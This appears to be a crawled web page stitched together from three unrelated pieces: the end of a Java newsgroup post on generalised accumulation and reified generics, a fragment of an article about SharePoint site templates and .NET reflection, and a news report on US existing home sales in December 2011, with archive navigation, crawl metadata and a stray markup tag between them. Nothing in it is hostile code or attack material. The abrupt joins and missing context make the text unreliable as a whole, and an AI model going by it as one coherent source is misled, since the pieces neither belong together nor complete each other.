Then again, this could be generalized further. Accumulation of
products, with identity 1; of logical-ors, with identity false; of
logical-ands, with identity true; and so forth. Maybe some notion of
generalized commutative, associative operations? Mathematicians call
that an abelian group. We'd need something less exotic and easier to
type. And yes, we'd need to be able to implement the same interface
with multiple sets of generic parameters in a single class. That would
need reified generics, since otherwise method foo taking an
Addable<Foo,Bar> that's also an Addable<Baz,Quux> and doing its add
won't know whether to call Bar add(foo) or Quux add(bar) at runtime
due to erasure.
.
- Follow-Ups:
- Re: Operator overloading [was Re: 7.0 wishlist?]
- From: Harold Yarmouth
- References:
-: hzergel901
- Operator overloading [was Re: 7.0 wishlist?]
- From: Joshua Cranmer
- Prev by Date: Re: Possible bug in Calendar
- Next by Date: Re: Files not writing, closing files, finalize()
- Previous by thread: Operator overloading [was Re: 7.0 wishlist?]
- Next by thread: Re: Operator overloading [was Re: 7.0 wishlist?]
- Index(es): | http://coding.derkeiler.com/Archive/Java/comp.lang.java.programmer/2008-11/msg01579.html | crawl-002 | refinedweb | 1,208 | 53.81 |
Once your users are done tweaking the look and feel of a given interface, they can save the design as a template. The templates are stored in the Site Template Collection list, located at the root site of the current site collection. For example, if your site URL is and you save it as a template, the template will be located in the Site Template Collection.
These templates are available during a site's creation process, from any level within the site collection tree (the root site and all its sub-sites). Figure 1 shows the template's availability during the site creation wizard. Your users now have the ability to replicate their site many times over, all without needing any assistance from you.
However, because all their properties are set at design time, creating sites based on these saved site templates results in static content. This can become a problem in today's business environment, which demands dynamic site content.
Enter Reflection
.NET brought with it a set of tools neatly grouped into the System.Reflection namespace, which solves this problem. Reflection allows you to query information from any assemblyeven the same assemblydynamically. Information such as properties, fields, and methods, which were declared as public in the assembly, can be reflected. In addition, reflection allows you to retrieve the values of these properties and/or fields as well as set those values dynamically. Reflection also allows you to dynamically invoke methods of the assembly at run time and dynamically compile the code. With it, you can dynamically set a template's Web part properties, thus rendering a static site dynamic.
Please enable Javascript in your browser, before you post the comment! Now Javascript is disabled.
Your name/nickname
Your email
WebSite
Subject
(Maximum characters: 1200). You have 1200 characters left. | http://www.devx.com/dotnet/Article/28315 | CC-MAIN-2017-26 | refinedweb | 301 | 55.84 |
This is the mail archive of the cygwin@cygwin.com mailing list for the Cygwin project.
...says the function isn't there, but there it is. This is in config.log, is this 'normal' and/or a 'known problem'?
configure:15213: checking for strtol
configure:15250: g++ -o conftest.exe -g -O2 -L/usr/local/lib/ conftest.cc -lexp
at >&5
configure:15228: declaration of C function `char strtol()' conflicts with
/usr/include/stdlib.h:99: previous declaration `long int strtol(const char*,
char**, int)' here
configure:15253: $? = 1
configure: failed program was:
#line 15218 "configure"
#include "confdefs.h"
/* System header to define __stub macros and hopefully few prototypes,
which can conflict with char strtol (); below. */
#include <assert.h>
/* Override any gcc2 internal prototype to avoid an error. */
#ifdef __cplusplus
extern "C"
#endif
/* We use char because int might match the return type of a gcc2
builtin and then its argument prototype would still apply. */
char strtol ();
char (*f) ();
int
main ()
{
/* The GNU C library defines this for functions which it implements
to always fail with ENOSYS. Some functions are actually named
something starting with __ and the normal name is an alias. */
#if defined (__stub_strtol) || defined (__stub___strtol)
choke me
#else
f = strtol;
#endif
;
return 0;
}
configure:15269: result: no
-- Lapo 'Raist' Luchini lapo@lapo.it (PGP & X.509 keys available) (ICQ UIN: 529796) -- Unsubscribe info: Bug reporting: Documentation: FAQ: | https://sourceware.org/legacy-ml/cygwin/2002-12/msg00718.html | CC-MAIN-2021-39 | refinedweb | 230 | 59.9 |
Problem with Two DataModelKeuller Magalhães Aug 29, 2007 9:46 AM
Hi people,
I have a seriuos problem with @DataModel at same Managed Bean. I have using Seam 1.2.1 + Ajax4JSF + MyFaces + Tomahawk + Facelets on Tomcat 5.5.23.
Here is snippet code of my managed bean:
@Name("servicoBean") @Scope(ScopeType.EVENT) public class ServicoBean { @Logger private Log log; @DataModel("categorias") private List<Categoria> categorias; @DataModelSelection("categorias") private Categoria categoria; @DataModel("servicos") private List<Servico> servicos; ... }
And code of my XHTML page:
<h:form <t:dataTable <t:column> <t:commandLink </t:column> </t:dataTable> </h:form>
The most curious is the first @DataModel() "categorias" works fine, but the second one "servicos" does not work. Any error is displayed on page, but the data aren't displayed. Is there any patch to correct it or any workaround to solve that ?
Anyone can help me, please.
Regards.
This content has been marked as final. Show 3 replies
1. Re: Problem with Two DataModelMahesh Shinde Aug 29, 2007 10:09 AM (in response to Keuller Magalhães)
First thing don't use Datamodel name and List name same.
Second define DataModelSelection for Servico.
Basically DataMOdelSelection used for Clickable Datatable.LIke if you have EDIT/DEL functionality on h:datatable.
2. Re: Problem with Two DataModelLucas de Oliveira Aug 29, 2007 10:15 AM (in response to Keuller Magalhães)
Hi!
I'm using Jboss Seam, so I'm not sure if it will be as helpfull as u like but I would cut off these Datamodel names. So in resume, try the code below:
; ... }
I've done that with JSF+Seam and it works like a charm.
cheers!
ps.: If that doesn't help it would be good to post the stack trace so we can take a look at it and see if it's something else.
3. Re: Problem with Two DataModelKeuller Magalhães Aug 29, 2007 10:32 AM (in response to Keuller Magalhães)
Thanks for all tips, but anyone works.
Below is my modified code:
; @DataModelSelection("servicos") private Servico servico; ... }
I dont change anyXHTML code of "servicos.xhtml" page. The first @DataModel "categoria" works fine and display all data, but second "servicos" does not works again. I use two XHTML pages, the first page called "servicos.xhtml" shows result of "categorias" DataModel object and second page "listServices.xhtml" shows the result of "servicos" DataModel object, but any data is displayed on "listServices.xhtml".
The action code fired by <t:commandLink /> inside <t:dataTable />:
.. public String selecionaCategoria(Categoria categ) { log.info("Selecionando a categoria..." + categ.getId()); this.categoria = categ; findServicos(); return "success"; } ...
I'm using JBoss EL to call this action method. Here is code of "listServices.xhtml" page:
... <h:form <t:dataList <h:outputText </t:dataList> </h:form> ...
This <t:dataTable /> is empty but there is data in DataModel collection. I have two @Factory objects for each @DataModel object.
Any suggestion ?
Regards. | https://developer.jboss.org/thread/138266 | CC-MAIN-2018-39 | refinedweb | 481 | 50.94 |
Views contain all the HTML that you’re application will use to render to the user. Unlike Django, views in Masonite are your HTML templates. All views are located inside the
resources/templates directory.
All views are rendered with Jinja2 so we can use all the Jinja2 code you are used to. An example view looks like:
resources/templates/helloworld.html<html><body><h1> Hello {{ 'world' }}</h1></body></html>
Since all views are located in
resources/templates, we can use simply create all of our views manually here or use our
craft command tool. To make a view just run:
terminal$ craft view hello
This will create a template under
resources/templates/hello.html.
The
View class is loaded into the container so we can retrieve it in our controller methods like so:
app/http/controllers/YourController.pyfrom masonite.view import Viewdef show(self, view: View):return view.render('dashboard')
This is exactly the same as using the helper function above. So if you choose to code more explicitly, the option is there for you.
If this looks weird to you or you are not sure how the container integrates with Masonite, make sure you read the Service Container documentation
Some views may not reside in the
resources/templates directory and may even reside in third party packages such as a dashboard package. We can locate these views by passing a
/ in front of our view.
For example as a use case we might pip install a package:
terminal$ pip install package-dashboard
and then be directed or required to return one of their views:
app/http/controllers/YourController.pydef show(self, view: View):return view.render('/package/views/dashboard')
This will look inside the
dashboard.views package for a
dashboard.html file and return that. You can obviously pass in data as usual.
Caveats
It's important to note that if you are building a third party package that integrates with Masonite that you place any
.html files inside a Python package instead of directly inside a module. For example, you should place .html files inside a file structure that looks like:
package/views/__init__.pyindex.htmldashboard.htmlsetup.pyMANIFEST.in...
ensuring there is a
__init__.py file. This is a Jinja2 limitation that says that all templates should be located in packages.
Accessing a global view such as:
app/http/controllers/YourController.pydef show(self, view: View):return view.render('/package/dashboard')
will perform an absolute import for your Masonite project. For example it will locate:
app/config/databases/...package/dashboard.html
Or find the package in a completely separate third part module. So if you are making a package for Masonite then keep this in mind of where you should put your templates.
Most of the time we’ll need to pass in data to our views. This data is passed in with a dictionary that contains a key which is the variable with the corresponding value. We can pass data to the function like so:
app/http/controllers/YourController.pydef show(self, view: View, request: Request):return view.render('dashboard', {'id': request.param('id')})
Remember that by passing in parameters like
Request to the controller method, we can retrieve objects from the IOC container. Read more about the IOC container in the Service Container documentation.
This will send a variable named
id to the view which can then be rendered like:
resources/templates/dashboard.html<html><body><h1> {{ id }} </h1></body></html>
Views use Jinja2 for it's template rendering. You can read about Jinja2 at the official documentation here.
Masonite also enables Jinja2 Line Statements by default which allows you to write syntax the normal way:
{% extends 'nav/base.html' %}{% block content %}{% for element in variables %}{{ element }}{% endfor %}{% if some_variable %}{{ some_variable }}{% endif %}{% endblock %}
Or using line statements with the
@ character:
@extends 'nav/base.html'@block content@for element in variables{{ element }}@endfor@if some_variable{{ some_variable }}@endif@endblock
The choice is yours on what you would like to use but keep in mind that line statements need to use only that line. Nothing can be after after or before the line.
This section requires knowledge of Service Providers and how the Service Container works. Be sure to read those documentation articles.
You can also add Jinja2 environments to the container which will be available for use in your views. This is typically done for third party packages such as Masonite Dashboard. You can extend views in a Service Provider in the boot method. Make sure the Service Provider has the
wsgi attribute set to
False. This way the specific Service Provider will not keep adding the environment on every request.
from masonite.view import Viewwsgi = False...def boot(self, view: View):view.add_environment('dashboard/templates')
By default the environment will be added using the PackageLoader Jinja2 loader but you can explicitly set which loader you want to use:
from jinja2 import FileSystemLoaderfrom masonite.view import View...wsgi = False...def boot(self, view: View):view.add_environment('dashboard/templates', loader=FileSystemLoader)
The default loader of
PackageLoader will work for most cases but if it doesn't work for your use case, you may need to change the Jinja2 loader type.
If using a
/ doesn't seem as clean to you, you can also optionally use dots:
def show(self, view: View):view.render('dashboard.user.show')
if you want to use a global view you still need to use the first
/:
def show(self, view: View):view.render('/dashboard.user.show')
There are quite a few built in helpers in your views. Here is an extensive list of all view helpers:
You can get the request class:
<p> Path: {{ request().path }} </p>
You can get the location of static assets:
If you have a configuration file like this:
config/storage.py....'s3': {'s3_client': 'sIS8shn...'...'location': ''},....
...<img src="{{ static('s3', 'profile.jpg') }}" alt="profile">...
this will render:
<img src="" alt="profile">
You can create a CSRF token hidden field to be used with forms:
<form action="/some/url" method="POST">{{ csrf_field }}<input ..></form>
You can get only the token that generates. This is useful for JS frontends where you need to pass a CSRF token to the backend for an AJAX call
<p> Token: {{ csrf_token }} </p>
You can also get the current authenticated user. This is the same as doing
request.user().
<p> User: {{ auth().email }} </p>
On forms you can typically only have either a GET or a POST because of the nature of html. With Masonite you can use a helper to submit forms with PUT or DELETE
<form action="/some/url" method="POST">{{ request_method('PUT') }}<input ..></form>
This will now submit this form as a PUT request.
You can get a route by it's name by using this method:
<form action="{{ route('route.name') }}" method="POST">..</form>
If your route contains variables you need to pass then you can supply a dictionary as the second argument.
<form action="{{ route('route.name', {'id': 1}) }}" method="POST">..</form>
or a list:
<form action="{{ route('route.name', [1]) }}" method="POST">..</form>
Another cool feature is that if the current route already contains the correct dictionary then you do not have to pass a second parameter. For example if you have a 2 routes like:
Get('/dashboard/@id', '[email protected]').name('dashboard.show'),Get('/dashhboard/@id/users', '[email protected]').name('dashhboard.users')
If you are accessing these 2 routes then the @id parameter will be stored on the user object. So instead of doing this:
<form action="{{ route('dashboard.users', {'id': 1}) }}" method="POST">..</form>
You can just leave it out completely since the
id key is already stored on the request object:
<form action="{{ route('dashboard.users') }}" method="POST">..</form>
This is useful for redirecting back to the previous page. If you supply this helper then the request.back() method will go to this endpoint. It's typically good to use this to go back to a page after a form is submitted with errors:
<form action="/some/url" method="POST">{{ back(request().path) }}</form>
Now when a form is submitted and you want to send the user back then in your controller you just have to do:
def show(self, request: Request):# Some failed validationreturn request.back()
The
request.back() method will also flash the current inputs to the session so you can get them when you land back on your template. You can get these values by using the
old() method:
<form><input type="text" name="email" value="{{ old('email') }}">...</form>
You can access the session here:
<p> Error: {{ session().get('error') }} </p>
You can sign things using your secret token:
<p> Signed: {{ sign('token') }} </p>
You can also unsign already signed string:
<p> Signed: {{ unsign('signed_token') }} </p>
This is just an alias for sign
This is just an alias for unsign
This allows you to easily fetch configuration values in your templates:
<h2> App Name: {{ config('application.name') }}</h2>
Allows you to fetch values from objects that may or may not be None. Instead of doing something like:
{% if auth() and auth().name == 'Joe' %}<p>Hello!</p>{% endif %}
You can use this helper:
{% if optional(auth()).name == 'Joe' %}<p>Hello!</p>{% endif %}
This is the normal dd helper you use in your controllers
You can use this helper to quickly add a hidden field
<form action="/" method="POST">{{ hidden('secret' name='secret-value') }}</form>
Check if a template exists
{% if exists('auth/base') %}{% extends 'auth/base.html' %}{% else %}{% extends 'base.html' %}{% endif %}
Gets a cookie:
<h2> Token: {{ cookie('token') }}</h2>
Get the URL to a location:
<form action="{{ url('/about', full=True) }}" method="POST"></form>
Below are some examples of the Jinja2 syntax which Masonite uses to build views.
It's important to note that Jinja2 statements can be rewritten with line statements and line statements are preferred in Masonite. In comparison to Jinja2 line statements evaluate the whole line, thus the name line statement.
So Jinja2 syntax looks like this:
{% if expression %}<p>do something</p>{% endif %}
This can be rewritten like this with line statement syntax:
@if expression<p>do something</p>@endif
It's important to note though that these are line statements. Meaning nothing else can be on the line when doing these. For example you CANNOT do this:
<form action="@if expression: 'something' @endif"></form>
But you could achieve that with the regular formatting:
<form action="{% if expression %} 'something' {% endif %}"></form>
Whichever syntax you choose is up to you.
You can show variable text by using
{{ }} characters:
<p>{{ variable }}</p><p>{{ 'hello world' }}</p>
If statements are similar to python but require an endif!
Line Statements:
@if expression<p>do something</p>@elif expression<p>do something else</p>@else<p>above all are false</p>@endif
Using alternative Jinja2 syntax:
{% if expression %}<p>do something</p>{% elif %}<p>do something else</p>{% else %}<p>above all are false</p>{% endif %}
For loop look similar to the regular python syntax.
Line Statements:
@for item in items<p>{{ item }}</p>@endfor
Using alternative Jinja2 syntax:
{% for item in items %}<p>{{ item }}</p>{% endfor %}
An include statement is useful for including other templates.
Line Statements:
@include 'components/errors.html'<form action="/"></form>
Using alternative Jinja2 syntax:
{% include 'components/errors.html' %}<form action="/"></form>
Any place you have repeating code you can break out and put it into an include template. These templates will have access to all variables in the current template.
This is useful for having a child template extend a parent template. There can only be 1 extends per template:
Line Statements:
@extends 'components/base.html'@block content<p> read below to find out what a block is </p>@endblock
Using alternative Jinja2 syntax:
{% extends 'components/base.html' %}{% block content %}<p> read below to find out what a block is </p>{% endblock %}
Blocks are sections of code that can be used as placeholders for a parent template. These are only useful when used with the
extends above. The "base.html" template is the parent template and contains blocks, which are defined in the child template "blocks.html".
Line Statements:
<!--
Using alternative Jinja2 syntax:
<!-- %}
As you see blocks are fundamental and can be defined with Jinja2 and line statements. It allows you to structure your templates and have less repeating code.
The blocks defined in the child template will be passed to the parent template. | https://docs.masoniteproject.com/the-basics/views | CC-MAIN-2020-34 | refinedweb | 2,053 | 56.96 |
.
Implement timers in Windows Phone
This article explains how to implement a timer (DispatcherTimer) in Windows Phone.
Windows Phone 8
Windows Phone 7.5
Introduction
The code example shows how to use DispatcherTimer on Windows Phone. Timers are very useful for executing code at specified time intervals.
Implementation
The code in this article is written using C#. A text box will be used to display a clock, which is refreshed every second. Follow the below steps to create the clock app:
- Create a new "Silverlight" project using C# language. Here we are naming the project as "Clock"
- Place a text box and a button.
- We are giving textbox name as "txtClock". We can also change the font and color of content in the text box.
- We will now add following code to the project.
using System;
using Microsoft.Phone.Controls;
using System.Windows.Threading;
namespace Clock
{
public partial class MainPage : PhoneApplicationPage
{
// Constructor
public MainPage()
{
InitializeComponent();
}
void OnTimerTick(Object sender, EventArgs args)
{
// text box property is set to current system date.
// ToString() converts the datetime value into text
txtClock.Text = DateTime.Now.ToString();
}
private void button1_Click(object sender, EventArgs e)
{
// creating timer instance
DispatcherTimer newTimer = new DispatcherTimer();
// timer interval specified as 1 second
newTimer.Interval = TimeSpan.FromSeconds(1);
// Sub-routine OnTimerTick will be called at every 1 second
newTimer.Tick += OnTimerTick;
// starting the timer
newTimer.Start();
}
}
}
Building and Running
The application is now ready to be built (Ctrl+Shift+B) and ran (Ctrl+F5) either on the emulator or a device.
Note
This application has been tested on the emulator, and should work on a physical device.) | http://developer.nokia.com/community/wiki/Implement_timers_in_Windows_Phone | CC-MAIN-2014-42 | refinedweb | 266 | 58.89 |
Finally, JDK 12 which is a part of the six-month release cycle, is here. It comes after the last Java LTS version 11. We had discussed at length on Java 11 features before. Today we’ll be discussing Java 12 features and see what it has in store for developers.
Java 12 was launched on March 19, 2019. It is a Non-LTS version. Hence it won’t have long term support.
Table of Contents
- 1 Java 12 Features
- 2 JVM Changes
- 3 Language Changes And Features
Java 12 Features
Some of the important Java 12 features are;
- JVM Changes – JEP 189, JEP 346, JEP 344, and JEP 230.
- Switch Expressions
- File mismatch() Method
- Compact Number Formatting
- Teeing Collectors in Stream API
- Java Strings New Methods – indent(), transform(), describeConstable(), and resolveConstantDesc().
- JEP 334: JVM Constants API
- JEP 305: Pattern Matching for instanceof
- Raw String Literals is Removed From JDK 12.
Let’s look into all these Java 12 features one by one.
JVM Changes
1. JEP 189 – Shenandoah: A Low-Pause-Time Garbage Collector (Experimental)
RedHat initiated Shenandoah Garbage Collector to reduce GC pause times. The idea is to run GC concurrently with the running Java threads.
It aims at consistent and predictable short pauses irrelevant of the heap size. So it does not matter if the heap size is 15 MB or 15GB.
It is an experimental feature in Java 12.
2. JEP 346 – Promptly Return Unused Committed Memory from G1
Stating Java 12, G1 will now check Java Heap memory during inactivity of application and return it to the operating system. This is a preemptive measure to conserve and use free memory.
3. JEP 344 : Abortable Mixed Collections for G1.
4. JEP 230 and 344
Microbenchmark Suite, JEP 230 feature adds a basic suite of microbenchmarks to the JDK source code. This makes it easy for developers to run existing microbenchmarks and create new ones.
One AArch64 Port, Not Two, JEP 344, removes all of the sources related to the arm64 port while retaining the 32-bit ARM port and the 64-bit aarch64 port. This allows contributors to focus their efforts on a single 64-bit ARM implementation
5. JEP 341 Default CDS Archives
This enhances the JDK build process to generate a class data-sharing (CDS) archive, using the default class list, on 64-bit platforms. The goal is to improve startup time. From Java 12, CDS is by default ON.
To run your program with CDS turned off do the following:
java -Xshare:off HelloWorld.java
Now, this would delay the startup time of the program.
Language Changes And Features
Java 12 has introduced many language features. Let us look at a few with implementations.
1. Switch Expressions (Preview)
Java 12 has enhanced Switch expressions for Pattern matching.
Introduced in JEP 325, as a preview language feature, the new Syntax is
L ->.
Following are some things to note about Switch Expressions:
- The new Syntax removes the need for break statement to prevent fallthroughs.
- Switch Expressions don’t fall through anymore.
- Furthermore, we can define multiple constants in the same label.
defaultcase is now compulsory in Switch Expressions.
breakis used in Switch Expressions to return values from a case itself.
Classic switch statement:
String result = ""; switch (day) { case "M": case "W": case "F": { result = "MWF"; break; } case "T": case "TH": case "S": { result = "TTS"; break; } }; System.out.println("Old Switch Result:"); System.out.println(result);
With the new Switch expression, we don’t need to set break everywhere thus prevent logic errors!
String result = switch (day) { case "M", "W", "F" -> "MWF"; case "T", "TH", "S" -> "TTS"; default -> { if(day.isEmpty()) break "Please insert a valid day."; else break "Looks like a Sunday."; } }; System.out.println(result);
Let’s run the below program containing the new Switch Expression using JDK 12.
public class SwitchExpressions { public static void main(String[] args) { System.out.println("New Switch Expression result:"); executeNewSwitchExpression("M"); executeNewSwitchExpression("TH"); executeNewSwitchExpression(""); executeNewSwitchExpression("SUN"); } public static void executeNewSwitchExpression(String day){ String result = switch (day) { case "M", "W", "F" -> "MWF"; case "T", "TH", "S" -> "TTS"; default -> { if(day.isEmpty()) break "Please insert a valid day."; else break "Looks like a Sunday."; } }; System.out.println(result); } }
Since this is a preview feature, please ensure that you have selected the Language Level as Java 12 preview.
To compile the above code run the following command:
javac -Xlint:preview --enable-preview -source 12 src/main/java/SwitchExpressions.java
After running the compiled program, we get the following in the console
Java Switch Expressions Program Output
2. File.mismatch method
Java 12 added the following method to compare two files:
public static long mismatch(Path path, Path path2) throws IOException
This method returns the position of the first mismatch or -1L if there is no mismatch.
Two files can have a mismatch in the following scenarios:
- If the bytes are not identical. In this case, the position of the first mismatching byte is returned.
- File sizes are not identical. In this case, the size of the smaller file is returned.
Example code snippet from IntelliJ Idea is given below:
import java.io.IOException; import java.nio.file.Files; import java.nio.file.Path; public class FileMismatchExample { public static void main(String[] args) throws IOException { Path filePath1 = Files.createTempFile("file1", ".txt"); Path filePath2 = Files.createTempFile("file2", ".txt"); Files.writeString(filePath1,"JournalDev Test String"); Files.writeString(filePath2,"JournalDev Test String"); long mismatch = Files.mismatch(filePath1, filePath2); System.out.println("File Mismatch position... It returns -1 if there is no mismatch"); System.out.println("Mismatch position in file1 and file2 is >>>>"); System.out.println(mismatch); filePath1.toFile().deleteOnExit(); filePath2.toFile().deleteOnExit(); System.out.println(); Path filePath3 = Files.createTempFile("file3", ".txt"); Path filePath4 = Files.createTempFile("file4", ".txt"); Files.writeString(filePath3,"JournalDev Test String"); Files.writeString(filePath4,"JournalDev.com Test String"); long mismatch2 = Files.mismatch(filePath3, filePath4); System.out.println("Mismatch position in file3 and file4 is >>>>"); System.out.println(mismatch2); filePath3.toFile().deleteOnExit(); filePath4.toFile().deleteOnExit(); } }
The output when the above Java Program is compiled and run is:
Java File Mismatch Example Program Output
3. Compact Number Formatting
import java.text.NumberFormat; import java.util.Locale; public class CompactNumberFormatting { public static void main(String[] args) { System.out.println("Compact Formatting is:"); NumberFormat upvotes = NumberFormat .getCompactNumberInstance(new Locale("en", "US"), NumberFormat.Style.SHORT); upvotes.setMaximumFractionDigits(1); System.out.println(upvotes.format(2592) + " upvotes"); NumberFormat upvotes2 = NumberFormat .getCompactNumberInstance(new Locale("en", "US"), NumberFormat.Style.LONG); upvotes2.setMaximumFractionDigits(2); System.out.println(upvotes2.format(2011) + " upvotes"); } }
Java Compact Number Formatting Program Output
4. Teeing Collectors
Teeing Collector is the new collector utility introduced in the Streams API.
This collector has three arguments – Two collectors and a Bi-function.
All input values are passed to each collector and the result is available in the Bi-function.
double mean = Stream.of(1, 2, 3, 4, 5) .collect(Collectors.teeing( summingDouble(i -> i), counting(), (sum, n) -> sum / n)); System.out.println(mean);
The output is 3.0.
5. Java Strings New Methods
4 new methods have been introduced in Java 12 which are:
- indent(int n)
- transform(Function super String,? extends R> f)
- Optional
describeConstable()
- String resolveConstantDesc(MethodHandles.Lookup lookup)
To know about the above methods and there implementation in detail, refer to our Java 12 String Methods tutorial.
6. JEP 334: JVM Constants API
A new package
java.lang.constant is introduced with this JEP. This is not that useful for those developers who don’t use constants pool.
7. JEP 305: Pattern Matching for instanceof (Preview)
Another Preview Language feature!
The old way to typecast a type to another type is:
if (obj instanceof String) { String s = (String) obj; // use s in your code from here }
The new way is :
if (obj instanceof String s) { // can use s directly here }
This saves us some typecasting which were unnecessary.
That brings an end to this article on Java 12 features.
Is pattern matching for instance of part of Java12 and not 14?
Excellent…! Good work, as always. And appreciate you getting this to us so quickly and precisely.
Thank you, I really like your article!
very nice Thanks
Nice and precise!
Thanks | https://www.journaldev.com/28666/java-12-features | CC-MAIN-2021-04 | refinedweb | 1,352 | 51.34 |
In Windows Server 2003, you can change domain names, here's a link
here's another link for Domains in Active Directory. It's in 2 parts but give all the information on forest/tree domain organization and DNS namespace [as AD requires DNS to function].
I should have added more info about the problem. Unfortunately these are Windows 2000 domains. Our new one will be Win 2003.
Since the NETBIOS name for the xyzcorp.local domain is "xyzcorp", this could cause problems when adding a new domain, right? Even if I create the new domain xyzcorp.business.com with a different NETBIOS name (i.e. NOT xyzcorp), could the new domain (xyzcorp.business.com) and the old domains co-exist on the same subnet without name conflicts?
Adding forest root domain after-the-fact
Old domains:
root.xyzcorp.business.com
xyzcorp.local
New desired domain:
xyzcorp.business.com
As we would like to do this in stages, can a new forest root domain (which would be the parent of the subdomain "root.xyzcorp.business.com") be added? If so, how would this best be approached?
This conversation is currently closed to new comments. | https://www.techrepublic.com/forums/discussions/adding-forest-root-domain-after-the-fact/ | CC-MAIN-2018-09 | refinedweb | 194 | 69.68 |
This is the mail archive of the gdb-patches@sourceware.org mailing list for the GDB project.
>>>>> "Doug" == Doug Evans <dje@google.com> writes: Doug> This patch is a first pass at supporting the Go language. Doug> There's still lots to do, but this is a start. Nice work. Doug> I have a few things I'd like to clean up before checking in Doug> but I don't plan on removing all FIXMEs. Doug> And I still need to document Go specific features. A few notes below. Doug> +/* Go objects should be embedded in a DW_TAG_module DIE, Doug> + and it's not clear if/how imported objects will appear. Doug> + To keep Go support simple until that's worked out, Doug> + go back through what we've read and create something usable. Doug> + We could do this while processing each DIE, and feels kinda cleaner, Doug> + but that way is more invasive. Doug> + This is to, for example, allow the user to type "p var" or "b main" Doug> + without having to specify the package name, and allow lookups Doug> + of module.object to work in contexts that use the expression Doug> + parser. */ I think this over-exposes some buildsym details to dwarf2read. How much more invasive is the alternative? Doug> + And if not, it should be clearly documented why not. Doug> + OTOH, why are we demangling at all here? Doug> + new_symbol_full assumes we return the mangled name. Doug> + I realize things are changing in this area, I just forget how. */ Doug> + if (cu->language == language_go) Doug> + { Doug> +#if 0 Doug> + demangled = cu->language_defn->la_demangle (mangled, 0); Doug> +#else Doug> + /* This is a lie, but we already lie to the caller new_symbol_full. Doug> + This just undoes that lie until things are cleaned up. */ Doug> + demangled = NULL; Doug> +#endif I've CC'd Keith to see if he can clear this up. Doug> +/* FIXME: IWBN to use c-exp.y's parse_number if we could. */ You could export it as c_parse_number or something like that, I suppose. Doug> + FIXME: Hacky, but until things solidify it's not worth much more. */ I think you could safely remove this FIXME. Doug> + /*{"->", RIGHT_ARROW, BINOP_END}, Doesn't exist in Go. */ Doug> +#if 0 /* -> doesn't exist in Go. */ Doug> + if (in_parse_field && tokentab2[i].token == RIGHT_ARROW) Doug> + last_was_structop = 1; Doug> +#endif I think you could zap this dead code. Doug> + /* TODO(dje): The encapsulation of what a pointer is belongs in value.c. Doug> + I.e. If there's going to be unpack_pointer, there should be Doug> + unpack_value_field_as_pointer. Do this until we can get Doug> + unpack_value_field_as_pointer. */ Doug> + LONGEST addr; Eventually I want us to get rid of val_print entirely and only have value_print. Then this won't be a problem; since you will just use the value API to access fields. Doug> + /* TODO(dje): Perhaps we should pass "UTF8" for ENCODING. Doug> + The target encoding is a global switch. Doug> + Either choice is problematic. */ Doug> + i = val_print_string (elt_type, NULL, addr, length, stream, options); What is the problem here? Tom | http://www.sourceware.org/ml/gdb-patches/2012-01/msg00058.html | CC-MAIN-2013-48 | refinedweb | 505 | 76.42 |
IWS (Instructional Work Servers). There are 4 instructional Unix servers: ceylon , fiji , sumatra , and tahiti Accessing the servers: Terminal Programs: telnet (insecure; cannot be used) ssh (via the TeraTerm or Putty programs from hctang@cs, zanfur@cs, awong@cs
[prompt]$ <command> <flags> <args>
fiji:/u15/awong$ ls –l -a unix-tutorial
Command
(Optional) arguments
Command Prompt
(Optional) flags
Note: In Unix, you’re expected to know what you’re doing. Many
commands will print a message only if something went wrong.
fiji:/u15/awong$ man –k password
passwd (5) - password file
xlock (1) - Locks the local X display until a password is entered
fiji:/u15/awong$ passwd
~ Your home directory
.. The parent directory
. The current directory
Note: Both of these commands will over-write existing files without warning you!
* Zero or more characters
? Zero or one character
Note: It is a good programming practice to use cerr instead of cout for error messages.
This tutorial provided by UW ACM to hctang@cs, zanfur@cs
fiji:ehsu% g++ -Wall –ansi -g –o hello hello.cpp
fiji:ehsu% ./hello
You saw this in 143!
These are the discrete steps to program “compilation”
Hitting the ‘!’ button in MSVC or typing a “g++ *.cpp” to build (not “compile”) your program hides all these separate steps.
Question: would you want to do this entire process (ie, pre-process and compile every file) every time you wanted to generate a new executable?“Compilation” or “The Big Lie”
.h
.h
.cpp
.cpp
Pre-proc
Pre-proc
compiler
compiler
ANSI lib
linker
other libs
.exe file
<target>: <requirements>
<command>
<variable>=<string value>
# Example Makefile
CXX=g++
CXXOPTS=-g –Wall -ansi -DDEBUG
foobar: foo.o bar.o
$(CXX) $(CXXOPTS) –o foobar foo.o bar.o
foo.o: foo.cc foo.hh
$(CXX) $(CXXOPTS) –c foo.cc
bar.o: bar.cc bar.hh
$(CXX) $(CXXOPTS) –c bar.cc
clean:
rm -f foo.o bar.o foobar
These template slides are freely stolen from Albert Wong (awong@cs)
Will this code compile?
/* Array.hh */
#ifndef ARRAY_HH
#define ARRAY_HH
template <typename T>
class Array {
Array( int i ) {
b = “Hello Mom!”;
}
};
#endif /* ARRAY_HH */
Will this program link?
The link error happens ata.GetCapacity()
Thus the definition of Array<int>::GetCapacity()never gets instantiated and compiled to object code.
/* main.cc */
#include <iostream>
using namespace std;
#include “Array.hh”
int main(void) {
Array<int> a(10);
cout << a.GetCapacity() << endl;
return 0;
}
#include “Array.cc”
template Array<int>;
template Array<double>;
This line forces the instantiation of the Array class template (and all its member functions), for ints.C++ Templates - The Safe Way
g++ -Wall -ansi main.cc ArrayInst.cc | https://www.slideserve.com/ania/iws-instructional-work-servers | CC-MAIN-2018-17 | refinedweb | 436 | 59.09 |
20 January 2012 16:24 [Source: ICIS news]
WASHINGTON (ICIS)--?xml:namespace>
In its monthly report, NAR said December saw sales of 4.61m residential units, on a seasonally adjusted annual basis, and followed November’s downwardly revised 4.39m home sales, which were 1% better than October.
Last month’s sales of existing single-family homes, condominiums and co-ops also marked a 3.6% improvement over the December 2010 level.
“The pattern of home sales in recent months demonstrates a market in recovery,” said Lawrence Yun, NAR chief economist. “Record low mortgage interest rates, job growth and bargain home prices are giving more consumers the confidence they need to enter the market."
For full year 2011, he said existing home sales rose 1.7% to 4.26m units sold from the 4.19m home sales recorded for 2010.
Association president Moe Veissi predicted the buying trend would continue through 2012.
“We have a large pent-up demand, and household formation is likely to return to normal as the job market steadily improves,” he said.
Household formations occur when young people leave their parents’ home to either rent an apartment or buy a house. Economists estimate that the 2008-2009 recession forced delay of as many as 2m household formations.
“More buyers coming into the market means additional benefits for the overall economy,” Veissi said, “and when people buy homes, they stimulate a lot of related goods and services.”
The housing market is a key downstream consuming sector for a wide variety of chemicals, resins and derivative products.
